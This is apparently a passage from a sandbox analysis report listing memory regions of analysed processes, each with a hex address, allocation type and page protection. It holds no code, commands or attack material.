heap
|
page read and write
|
||
938000
|
heap
|
page read and write
|
||
3BEBE000
|
stack
|
page read and write
|
||
F4CA17D000
|
stack
|
page read and write
|
||
921000
|
heap
|
page read and write
|
||
7FFD9BA86000
|
trusted library allocation
|
page execute and read and write
|
||
7FF70CCCC000
|
unkown
|
page write copy
|
||
1F453197000
|
heap
|
page execute and read and write
|
||
3DBC0000
|
heap
|
page read and write
|
||
19526FF000
|
stack
|
page read and write
|
||
91C000
|
heap
|
page read and write
|
||
26A9E000
|
stack
|
page read and write
|
||
7FF70CCBF000
|
unkown
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
7FF70CCAD000
|
unkown
|
page write copy
|
||
776000
|
heap
|
page read and write
|
||
9CC000
|
heap
|
page read and write
|
||
F4CA4FF000
|
stack
|
page read and write
|
||
22A45B30000
|
heap
|
page read and write
|
||
7FDE0000
|
direct allocation
|
page read and write
|
||
938000
|
heap
|
page read and write
|
||
3FAF2000
|
heap
|
page read and write
|
||
7FF70CCCD000
|
unkown
|
page readonly
|
||
27570000
|
heap
|
page read and write
|
||
935000
|
heap
|
page read and write
|
||
27505000
|
heap
|
page read and write
|
||
97B000
|
heap
|
page read and write
|
||
24F3000
|
direct allocation
|
page read and write
|
||
24EC000
|
direct allocation
|
page read and write
|
||
3F7CC000
|
heap
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
C8417FF000
|
stack
|
page read and write
|
||
279A9000
|
direct allocation
|
page execute and read and write
|
||
265B6000
|
direct allocation
|
page read and write
|
||
265ED000
|
direct allocation
|
page read and write
|
||
770000
|
heap
|
page read and write
|
||
4E4000
|
unkown
|
page execute and read and write
|
||
4C9000
|
unkown
|
page read and write
|
||
7FFD9BA56000
|
trusted library allocation
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
1C7CC240000
|
heap
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
952000
|
heap
|
page read and write
|
||
617AAFB000
|
stack
|
page read and write
|
||
14172DC3000
|
heap
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
265FC000
|
direct allocation
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
2641000
|
heap
|
page read and write
|
||
3FC70000
|
heap
|
page read and write
|
||
3FAA5000
|
heap
|
page read and write
|
||
7EB70000
|
direct allocation
|
page read and write
|
||
931000
|
heap
|
page read and write
|
||
7FF6FEF9F000
|
unkown
|
page readonly
|
||
2310000
|
heap
|
page read and write
|
||
1F4530C8000
|
heap
|
page read and write
|
||
7FF6996CA000
|
unkown
|
page readonly
|
||
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page write copy
|
||
C84137C000
|
stack
|
page read and write
|
||
217FD5A3000
|
heap
|
page read and write
|
||
584000
|
heap
|
page read and write
|
||
C56000
|
heap
|
page read and write
|
||
7FB70000
|
direct allocation
|
page read and write
|
||
1FEF10C8000
|
heap
|
page read and write
|
||
7FF70CCCD000
|
unkown
|
page readonly
|
||
9C9000
|
heap
|
page read and write
|
||
7EDE0000
|
direct allocation
|
page read and write
|
||
2741000
|
heap
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
7FF6996D7000
|
unkown
|
page readonly
|
||
624000
|
heap
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
2501000
|
direct allocation
|
page read and write
|
||
2C475EA0000
|
heap
|
page read and write
|
||
F4CA5FF000
|
stack
|
page read and write
|
||
217FD5BB000
|
heap
|
page read and write
|
||
A7C000
|
stack
|
page read and write
|
||
9A9000
|
heap
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
1E89226B000
|
heap
|
page read and write
|
||
707000
|
heap
|
page read and write
|
||
3DD7FFE000
|
stack
|
page read and write
|
||
1F43B025000
|
trusted library allocation
|
page read and write
|
||
14173B00000
|
heap
|
page read and write
|
||
23BBAC40000
|
heap
|
page read and write
|
||
61E000
|
stack
|
page read and write
|
||
2624000
|
direct allocation
|
page read and write
|
||
2745000
|
heap
|
page read and write
|
||
7F390000
|
direct allocation
|
page read and write
|
||
26CDE000
|
stack
|
page read and write
|
||
AEE000
|
stack
|
page read and write
|
||
27506000
|
heap
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
7EA50000
|
direct allocation
|
page read and write
|
||
4B9000
|
unkown
|
page execute and read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
25A0000
|
heap
|
page read and write
|
||
265477E000
|
stack
|
page read and write
|
||
4610000
|
trusted library allocation
|
page read and write
|
||
C50000
|
heap
|
page read and write
|
||
994000
|
heap
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page write copy
|
||
2250000
|
heap
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page write copy
|
||
6AE000
|
stack
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
3FA89000
|
heap
|
page read and write
|
||
7F480000
|
direct allocation
|
page read and write
|
||
94A000
|
heap
|
page read and write
|
||
1C7CC268000
|
heap
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
1C7CC263000
|
heap
|
page read and write
|
||
92E000
|
heap
|
page read and write
|
||
7FF70CCC4000
|
unkown
|
page read and write
|
||
2750C000
|
heap
|
page read and write
|
||
265D0000
|
direct allocation
|
page read and write
|
||
1FEF2AC3000
|
heap
|
page read and write
|
||
27571000
|
heap
|
page read and write
|
||
1E892480000
|
heap
|
page read and write
|
||
26D1E000
|
stack
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
1C7CC430000
|
heap
|
page read and write
|
||
1AC39CB0000
|
heap
|
page read and write
|
||
2523000
|
heap
|
page read and write
|
||
93A000
|
heap
|
page read and write
|
||
7F5D0000
|
direct allocation
|
page read and write
|
||
26E91000
|
direct allocation
|
page execute and read and write
|
||
7EEA0000
|
direct allocation
|
page read and write
|
||
94E000
|
heap
|
page read and write
|
||
26E00FA0000
|
heap
|
page read and write
|
||
7FF70CCCD000
|
unkown
|
page readonly
|
||
27502000
|
heap
|
page read and write
|
||
274FA000
|
heap
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
26E60000
|
remote allocation
|
page read and write
|
||
7F380000
|
direct allocation
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
7F598000
|
direct allocation
|
page read and write
|
||
945000
|
heap
|
page read and write
|
||
7FF70CCC4000
|
unkown
|
page read and write
|
||
1CC000
|
stack
|
page read and write
|
||
26D1E000
|
stack
|
page read and write
|
||
7FFD9B9A2000
|
trusted library allocation
|
page read and write
|
||
19B4F3E000
|
stack
|
page read and write
|
||
265BD000
|
direct allocation
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
993000
|
heap
|
page read and write
|
||
27518000
|
heap
|
page read and write
|
||
978000
|
heap
|
page read and write
|
||
7FF70CCCC000
|
unkown
|
page write copy
|
||
7F310000
|
direct allocation
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
1F44AF01000
|
trusted library allocation
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
2C23B610000
|
heap
|
page read and write
|
||
1FEF110B000
|
heap
|
page read and write
|
||
F6554FE000
|
stack
|
page read and write
|
||
91C000
|
heap
|
page read and write
|
||
19C000
|
stack
|
page read and write
|
||
3FC6E000
|
heap
|
page read and write
|
||
690000
|
heap
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
7F44F000
|
direct allocation
|
page read and write
|
||
22FE2EA0000
|
heap
|
page read and write
|
||
9C3000
|
heap
|
page read and write
|
||
7EE60000
|
direct allocation
|
page read and write
|
||
7F1F0000
|
direct allocation
|
page read and write
|
||
7FF70CCCD000
|
unkown
|
page readonly
|
||
28BE7460000
|
heap
|
page read and write
|
||
942000
|
heap
|
page read and write
|
||
1AC39C90000
|
heap
|
page read and write
|
||
1AC39FE5000
|
heap
|
page read and write
|
||
88C000
|
stack
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
6E0000
|
heap
|
page read and write
|
||
94A000
|
heap
|
page read and write
|
||
7FF70CCBF000
|
unkown
|
page read and write
|
||
1F43AF6A000
|
trusted library allocation
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
17C000
|
stack
|
page read and write
|
||
7FF6FEF9E000
|
unkown
|
page write copy
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
34CAFF000
|
stack
|
page read and write
|
||
3E44E000
|
stack
|
page read and write
|
||
F6551ED000
|
stack
|
page read and write
|
||
7EF30000
|
direct allocation
|
page read and write
|
||
71E000
|
heap
|
page read and write
|
||
26E011E0000
|
heap
|
page read and write
|
||
27506000
|
heap
|
page read and write
|
||
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
7FF70CCB1000
|
unkown
|
page read and write
|
||
40116000
|
direct allocation
|
page execute and read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
217FD5DB000
|
heap
|
page read and write
|
||
279AB000
|
direct allocation
|
page execute and read and write
|
||
27941000
|
direct allocation
|
page execute and read and write
|
||
7FF70CCCD000
|
unkown
|
page readonly
|
||
10DE84F0000
|
heap
|
page read and write
|
||
24DD000
|
direct allocation
|
page read and write
|
||
93C000
|
heap
|
page read and write
|
||
7FF70CCCD000
|
unkown
|
page readonly
|
||
1DFC9665000
|
heap
|
page read and write
|
||
D0B9CFF000
|
stack
|
page read and write
|
||
98A000
|
heap
|
page read and write
|
||
222C000
|
stack
|
page read and write
|
||
98A000
|
heap
|
page read and write
|
||
99F000
|
heap
|
page read and write
|
||
939000
|
heap
|
page read and write
|
||
3FCB1000
|
heap
|
page read and write
|
||
7ECC0000
|
direct allocation
|
page read and write
|
||
1BD753E7000
|
heap
|
page read and write
|
||
2750A000
|
heap
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
7FF70CCAD000
|
unkown
|
page read and write
|
||
4AA000
|
unkown
|
page execute and read and write
|
||
2990D85B000
|
heap
|
page read and write
|
||
27571000
|
heap
|
page read and write
|
||
778000
|
heap
|
page read and write
|
||
2990D823000
|
heap
|
page read and write
|
||
1DFC9680000
|
heap
|
page read and write
|
||
1DFC9640000
|
heap
|
page read and write
|
||
938000
|
heap
|
page read and write
|
||
7E870000
|
direct allocation
|
page read and write
|
||
19B597B000
|
stack
|
page read and write
|
||
217FD3F0000
|
heap
|
page read and write
|
||
1F453087000
|
heap
|
page read and write
|
||
141552F0000
|
heap
|
page read and write
|
||
3FBE3000
|
heap
|
page read and write
|
||
A8DC0FE000
|
stack
|
page read and write
|
||
2368000
|
direct allocation
|
page read and write
|
||
7FF7E0A31000
|
unkown
|
page execute read
|
||
4CB000
|
unkown
|
page write copy
|
||
7FF70CCB1000
|
unkown
|
page read and write
|
||
1F439090000
|
heap
|
page read and write
|
||
27570000
|
heap
|
page read and write
|
||
97C000
|
heap
|
page read and write
|
||
9A9000
|
heap
|
page read and write
|
||
7ED50000
|
direct allocation
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page read and write
|
||
932000
|
heap
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
98A000
|
heap
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page write copy
|
||
D0B9BFF000
|
stack
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
1F43B409000
|
trusted library allocation
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page read and write
|
||
217FFBA0000
|
heap
|
page read and write
|
||
4C0000
|
unkown
|
page execute and read and write
|
||
2746000
|
heap
|
page read and write
|
||
14155127000
|
heap
|
page read and write
|
||
27964000
|
direct allocation
|
page execute and read and write
|
||
7FF70CCBF000
|
unkown
|
page read and write
|
||
1DFC9870000
|
heap
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
26CE000
|
stack
|
page read and write
|
||
1417137A000
|
heap
|
page read and write
|
||
2342000
|
direct allocation
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
23BBAAC0000
|
heap
|
page read and write
|
||
1E892485000
|
heap
|
page read and write
|
||
7FD7C000
|
direct allocation
|
page read and write
|
||
189000
|
stack
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page read and write
|
||
769487E000
|
stack
|
page read and write
|
||
985000
|
heap
|
page read and write
|
||
217FD5AA000
|
heap
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
217FD5A6000
|
heap
|
page read and write
|
||
584000
|
heap
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
3FC50000
|
heap
|
page read and write
|
||
1F439060000
|
heap
|
page read and write
|
||
2772F000
|
stack
|
page read and write
|
||
14171386000
|
heap
|
page read and write
|
||
21C51530000
|
heap
|
page read and write
|
||
7FFD9BB51000
|
trusted library allocation
|
page read and write
|
||
4701B1C000
|
stack
|
page read and write
|
||
6B4000
|
heap
|
page read and write
|
||
166CFC20000
|
heap
|
page read and write
|
||
93A000
|
heap
|
page read and write
|
||
7EA10000
|
direct allocation
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
45C000
|
unkown
|
page write copy
|
||
19D000
|
stack
|
page read and write
|
||
4EB000
|
remote allocation
|
page execute and read and write
|
||
1F43B42E000
|
trusted library allocation
|
page read and write
|
||
430000
|
heap
|
page read and write
|
||
26BDE000
|
stack
|
page read and write
|
||
19B547F000
|
stack
|
page read and write
|
||
3C010000
|
heap
|
page read and write
|
||
A5E000
|
heap
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page write copy
|
||
2C475EE0000
|
heap
|
page read and write
|
||
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
2751E000
|
heap
|
page read and write
|
||
10DE83E0000
|
heap
|
page read and write
|
||
3C000000
|
heap
|
page read and write
|
||
7EE70000
|
direct allocation
|
page read and write
|
||
1E8921D0000
|
heap
|
page read and write
|
||
7EAE0000
|
direct allocation
|
page read and write
|
||
D70000
|
heap
|
page read and write
|
||
27657000
|
heap
|
page read and write
|
||
970000
|
heap
|
page read and write
|
||
14171360000
|
heap
|
page read and write
|
||
3DD7B9C000
|
stack
|
page read and write
|
||
2456000
|
direct allocation
|
page read and write
|
||
6F0000
|
direct allocation
|
page execute and read and write
|
||
9D5000
|
heap
|
page read and write
|
||
2641000
|
direct allocation
|
page read and write
|
||
977000
|
heap
|
page read and write
|
||
7EE70000
|
direct allocation
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page write copy
|
||
660000
|
heap
|
page read and write
|
||
26E1D000
|
stack
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
20B8000
|
heap
|
page read and write
|
||
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
4CE000
|
unkown
|
page execute and read and write
|
||
40D000
|
unkown
|
page write copy
|
||
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
2990DA00000
|
heap
|
page read and write
|
||
23BBA9A0000
|
heap
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
23C0000
|
heap
|
page read and write
|
||
1FEF10DA000
|
heap
|
page read and write
|
||
4AE000
|
stack
|
page read and write
|
||
265A8000
|
direct allocation
|
page read and write
|
||
7FF70CCBF000
|
unkown
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
7FF70CCB1000
|
unkown
|
page read and write
|
||
270881C0000
|
heap
|
page read and write
|
||
265C9000
|
direct allocation
|
page read and write
|
||
2C475DAB000
|
heap
|
page read and write
|
||
272A4000
|
heap
|
page read and write
|
||
272A4000
|
heap
|
page read and write
|
||
28AC000
|
direct allocation
|
page execute and read and write
|
||
217FD4F5000
|
heap
|
page read and write
|
||
2990D9B0000
|
heap
|
page read and write
|
||
1F4390B0000
|
heap
|
page read and write
|
||
3E6CE000
|
stack
|
page read and write
|
||
239A000
|
direct allocation
|
page read and write
|
||
7FB70000
|
direct allocation
|
page read and write
|
||
264F0000
|
direct allocation
|
page read and write
|
||
92E000
|
heap
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
27518000
|
heap
|
page read and write
|
||
631000
|
heap
|
page read and write
|
||
7F75B000
|
direct allocation
|
page read and write
|
||
2648000
|
direct allocation
|
page read and write
|
||
28BE73E0000
|
heap
|
page read and write
|
||
3DBC4000
|
heap
|
page read and write
|
||
938000
|
heap
|
page read and write
|
||
4EB000
|
unkown
|
page execute and read and write
|
||
166CFDC0000
|
heap
|
page read and write
|
||
93C000
|
heap
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
1FEF1108000
|
heap
|
page read and write
|
||
787000
|
heap
|
page read and write
|
||
908E6FE000
|
stack
|
page read and write
|
||
3FC60000
|
heap
|
page read and write
|
||
1FEF110B000
|
heap
|
page read and write
|
||
584000
|
heap
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
617ACFF000
|
stack
|
page read and write
|
||
1F4530CD000
|
heap
|
page read and write
|
||
7FF70CCB1000
|
unkown
|
page read and write
|
||
936000
|
heap
|
page read and write
|
||
98E000
|
heap
|
page read and write
|
||
26BDE000
|
stack
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
2C475DC2000
|
heap
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
401000
|
unkown
|
page execute read
|
||
2C23B433000
|
heap
|
page read and write
|
||
7FFD9BB5A000
|
trusted library allocation
|
page read and write
|
||
7FF699729000
|
unkown
|
page readonly
|
||
1C7CC615000
|
heap
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
7E940000
|
direct allocation
|
page read and write
|
||
2990D710000
|
heap
|
page read and write
|
||
27571000
|
heap
|
page read and write
|
||
27518000
|
heap
|
page read and write
|
||
25A1000
|
heap
|
page read and write
|
||
93F000
|
stack
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
7FF6FEF9B000
|
unkown
|
page readonly
|
||
10DE85F0000
|
heap
|
page read and write
|
||
2350000
|
direct allocation
|
page read and write
|
||
10DE8690000
|
heap
|
page read and write
|
||
7FF70CCCD000
|
unkown
|
page readonly
|
||
26B8F000
|
stack
|
page read and write
|
||
22FE2EB7000
|
heap
|
page read and write
|
||
19B56F9000
|
stack
|
page read and write
|
||
2660A000
|
direct allocation
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
217FD5DB000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
250E000
|
stack
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
1F43B01F000
|
trusted library allocation
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
14155120000
|
heap
|
page read and write
|
||
1FEF2F10000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
3E68F000
|
stack
|
page read and write
|
||
4DD000
|
remote allocation
|
page execute and read and write
|
||
21C51525000
|
heap
|
page read and write
|
||
6F0000
|
direct allocation
|
page execute and read and write
|
||
21C513C0000
|
heap
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
580000
|
heap
|
page read and write
|
||
7FF70CCBF000
|
unkown
|
page read and write
|
||
23BBA9C9000
|
heap
|
page read and write
|
||
2C23B530000
|
heap
|
page read and write
|
||
78E000
|
heap
|
page read and write
|
||
1F43B3D4000
|
trusted library allocation
|
page read and write
|
||
28BE74BB000
|
heap
|
page read and write
|
||
7ED50000
|
direct allocation
|
page read and write
|
||
7FF70CCBF000
|
unkown
|
page read and write
|
||
27570000
|
heap
|
page read and write
|
||
1F43B3AC000
|
trusted library allocation
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
3E7CF000
|
stack
|
page read and write
|
||
1BD75350000
|
heap
|
page read and write
|
||
98A000
|
heap
|
page read and write
|
||
27571000
|
heap
|
page read and write
|
||
3C20F000
|
stack
|
page read and write
|
||
44B000
|
unkown
|
page execute and read and write
|
||
936000
|
heap
|
page read and write
|
||
177000
|
stack
|
page read and write
|
||
2990D81F000
|
heap
|
page read and write
|
||
2641000
|
heap
|
page read and write
|
||
7FF7E0A30000
|
unkown
|
page readonly
|
||
2990D83B000
|
heap
|
page read and write
|
||
1BD75630000
|
heap
|
page read and write
|
||
7FF70CCB1000
|
unkown
|
page read and write
|
||
94B000
|
heap
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
7FF70CCCC000
|
unkown
|
page write copy
|
||
938000
|
heap
|
page read and write
|
||
19B53FE000
|
stack
|
page read and write
|
||
19524FC000
|
stack
|
page read and write
|
||
1F43911E000
|
heap
|
page read and write
|
||
984000
|
heap
|
page read and write
|
||
4C6000
|
unkown
|
page write copy
|
||
2748000
|
heap
|
page read and write
|
||
27570000
|
heap
|
page read and write
|
||
217FD597000
|
heap
|
page read and write
|
||
1FEF1123000
|
heap
|
page read and write
|
||
3E30E000
|
stack
|
page read and write
|
||
4F0000
|
heap
|
page read and write
|
||
1F4390F2000
|
heap
|
page read and write
|
||
938000
|
heap
|
page read and write
|
||
217FD500000
|
heap
|
page read and write
|
||
1BD753E3000
|
heap
|
page read and write
|
||
2671A000
|
stack
|
page read and write
|
||
26E94000
|
direct allocation
|
page execute and read and write
|
||
2C23B510000
|
heap
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
D0B9AFD000
|
stack
|
page read and write
|
||
CD5A8FF000
|
stack
|
page read and write
|
||
7FF70CCCD000
|
unkown
|
page readonly
|
||
7FF70CCAD000
|
unkown
|
page write copy
|
||
3BE70000
|
heap
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
27517000
|
heap
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
27518000
|
heap
|
page read and write
|
||
4CE000
|
remote allocation
|
page execute and read and write
|
||
27290000
|
heap
|
page read and write
|
||
ED4C0FD000
|
stack
|
page read and write
|
||
1FEF110B000
|
heap
|
page read and write
|
||
217FD5A6000
|
heap
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
34C9FE000
|
stack
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
238C000
|
direct allocation
|
page read and write
|
||
99F000
|
heap
|
page read and write
|
||
21C513CD000
|
heap
|
page read and write
|
||
4DD000
|
unkown
|
page execute and read and write
|
||
23A8000
|
direct allocation
|
page read and write
|
||
2990D818000
|
heap
|
page read and write
|
||
1F4530A5000
|
heap
|
page read and write
|
||
1F453052000
|
heap
|
page read and write
|
||
28BE75B0000
|
heap
|
page read and write
|
||
7FF6FEF9F000
|
unkown
|
page readonly
|
||
7FF70CCCC000
|
unkown
|
page write copy
|
||
26E01010000
|
heap
|
page read and write
|
||
584000
|
heap
|
page read and write
|
||
1DFC9850000
|
heap
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
18F000
|
stack
|
page read and write
|
||
270881E0000
|
heap
|
page read and write
|
||
1AC39D60000
|
heap
|
page read and write
|
||
7FF70CCCD000
|
unkown
|
page readonly
|
||
400000
|
unkown
|
page readonly
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
2740000
|
trusted library allocation
|
page read and write
|
||
7F5EE000
|
direct allocation
|
page read and write
|
||
971000
|
heap
|
page read and write
|
||
265F4000
|
direct allocation
|
page read and write
|
||
935000
|
heap
|
page read and write
|
||
1AC39FE0000
|
heap
|
page read and write
|
||
7EE60000
|
direct allocation
|
page read and write
|
||
1C7CC350000
|
heap
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
217FEE63000
|
heap
|
page read and write
|
||
7F40F000
|
direct allocation
|
page read and write
|
||
96A000
|
heap
|
page read and write
|
||
1F4391AD000
|
heap
|
page read and write
|
||
92D000
|
heap
|
page read and write
|
||
217FD5DB000
|
heap
|
page read and write
|
||
7FD00000
|
direct allocation
|
page read and write
|
||
2A7F000
|
direct allocation
|
page execute and read and write
|
||
93D000
|
heap
|
page read and write
|
||
28A1000
|
direct allocation
|
page execute and read and write
|
||
8A0000
|
heap
|
page read and write
|
||
7EEE0000
|
direct allocation
|
page read and write
|
||
3DBC7000
|
heap
|
page read and write
|
||
935000
|
heap
|
page read and write
|
||
584000
|
heap
|
page read and write
|
||
1F43AEF0000
|
heap
|
page execute and read and write
|
||
27571000
|
heap
|
page read and write
|
||
10DE86A0000
|
heap
|
page read and write
|
||
7FF70CCB1000
|
unkown
|
page read and write
|
||
7FF6FEF91000
|
unkown
|
page execute read
|
||
45C000
|
unkown
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
A50000
|
heap
|
page read and write
|
||
4C7000
|
unkown
|
page read and write
|
||
97D000
|
heap
|
page read and write
|
||
7FF70CCB1000
|
unkown
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
970000
|
heap
|
page read and write
|
||
930000
|
heap
|
page read and write
|
||
950000
|
heap
|
page read and write
|
||
92B000
|
heap
|
page read and write
|
||
26D3000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
CD5A87D000
|
stack
|
page read and write
|
||
2745000
|
heap
|
page read and write
|
||
630000
|
trusted library allocation
|
page read and write
|
||
2C23B600000
|
heap
|
page read and write
|
||
5CE000
|
stack
|
page read and write
|
||
2990D910000
|
heap
|
page read and write
|
||
9A7000
|
heap
|
page read and write
|
||
7EDCF000
|
direct allocation
|
page read and write
|
||
27571000
|
heap
|
page read and write
|
||
1F453035000
|
heap
|
page read and write
|
||
996000
|
heap
|
page read and write
|
||
26D0000
|
heap
|
page read and write
|
||
3FC51000
|
heap
|
page read and write
|
||
1FEF10D6000
|
heap
|
page read and write
|
||
14155050000
|
heap
|
page read and write
|
||
787000
|
heap
|
page read and write
|
||
7FF70CCB1000
|
unkown
|
page read and write
|
||
7FF70CCCC000
|
unkown
|
page write copy
|
||
1FEF13A5000
|
heap
|
page read and write
|
||
4E4000
|
remote allocation
|
page execute and read and write
|
||
584000
|
heap
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page read and write
|
||
1F43B0EE000
|
trusted library allocation
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
7FF70CCAD000
|
unkown
|
page read and write
|
||
2990D85B000
|
heap
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
10DE83EB000
|
heap
|
page read and write
|
||
3FC5F000
|
heap
|
page read and write
|
||
9B000
|
stack
|
page read and write
|
||
26E60000
|
remote allocation
|
page read and write
|
||
27571000
|
heap
|
page read and write
|
||
2776E000
|
stack
|
page read and write
|
||
21C514C0000
|
heap
|
page read and write
|
||
3FA89000
|
heap
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page read and write
|
||
2748000
|
heap
|
page read and write
|
||
7FF6FEF9E000
|
unkown
|
page read and write
|
||
62E000
|
stack
|
page read and write
|
||
3FCE1000
|
heap
|
page read and write
|
||
74B8FB000
|
stack
|
page read and write
|
||
217FD590000
|
heap
|
page read and write
|
||
921000
|
heap
|
page read and write
|
||
935000
|
heap
|
page read and write
|
||
1FEF10DA000
|
heap
|
page read and write
|
||
24E03DE0000
|
heap
|
page read and write
|
||
7FF70CCCD000
|
unkown
|
page readonly
|
||
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
23BBA8C0000
|
heap
|
page read and write
|
||
2751E000
|
heap
|
page read and write
|
||
9B000
|
stack
|
page read and write
|
||
1F43B2BA000
|
trusted library allocation
|
page read and write
|
||
1F43AA00000
|
heap
|
page read and write
|
There are 1515 hidden memdumps, click here to show them.